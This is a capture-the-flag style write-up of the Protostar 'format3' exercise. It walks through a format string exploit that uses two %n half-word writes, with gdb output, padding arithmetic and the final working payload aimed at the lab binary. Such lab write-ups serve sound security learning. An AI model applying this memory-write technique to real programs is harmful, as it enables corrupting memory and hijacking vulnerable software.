In the previous exercise we had to write a certain value into a memory address. That value was 64, which fits into 1 byte. In this exercise we have to write 0x01025544 into target. This can be accomplished if we write the value as two half-words. In this case we have to take care of the order in which we write the values, because each %n writes 4 bytes.

The diagrams below show the 6 bytes starting at target, highest address on the left.

First write (4 bytes at target):
    0x00 0x00 0x00 0x00 0x00 0x00
              0x00 0x00 0x55 0x44

After first write:
    0x00 0x00 0x00 0x00 0x55 0x44

Second write (4 bytes at target+2):
    0x00 0x00 0x00 0x00 0x55 0x44
    0x00 0x01 0x01 0x02

After second write:
    0x00 0x01 0x01 0x02 0x55 0x44

The counter used by %n can only increase, but the value needed for the second write, 0x0102, is smaller than the first one. We can solve this problem easily if we let the value overflow and write 0x010102 instead: the extra 0x01 lands in the byte above target, where it does no harm. In order to avoid confusion, I will write it as 0x(01)0102.


The address of target is 0x080496f4.

I placed the two addresses (target and target+2, i.e. 0x080496f4 and 0x080496f6) at the beginning of the format string. The two specifiers that follow, %12$x and %13$x, print out those addresses.

$ python -c 'print "\xf4\x96\x04\x08\xf6\x96\x04\x08%12$x%13$x"' > /tmp/1

(gdb) r < /tmp/1

80496f480496f6


I replaced the x with n in both specifiers and placed a breakpoint after the printf function call. Each %n writes the number of characters printed so far, which is 8 (the two addresses), so target reads 0x00080008: 8 written at target and 8 written at target+2.

$ python -c 'print "\xf4\x96\x04\x08\xf6\x96\x04\x08%12$n%13$n"' > /tmp/1

(gdb) x/x 0x080496f4
0x80496f4 : 0x00080008


I modified the solution to write the correct value into the memory area. 0x01025544 can be split into 0x(01)0102 and 0x5544, where 0x(01)0102 = 65794 and 0x5544 = 21828.
I wrote 8 bytes at the beginning of the format string, so the first padding value is 21828 - 8 = 21820.
The second padding value is 65794 - 8 - 21820 = 43966. Here 8 is the size of the two addresses and 21820 is the width of the %21820d padding.

$ python -c 'print "\xf4\x96\x04\x08\xf6\x96\x04\x08%21820d%12$n%43966d%13$n"' > /tmp/1
$ cat /tmp/1 | /opt/protostar/bin/format3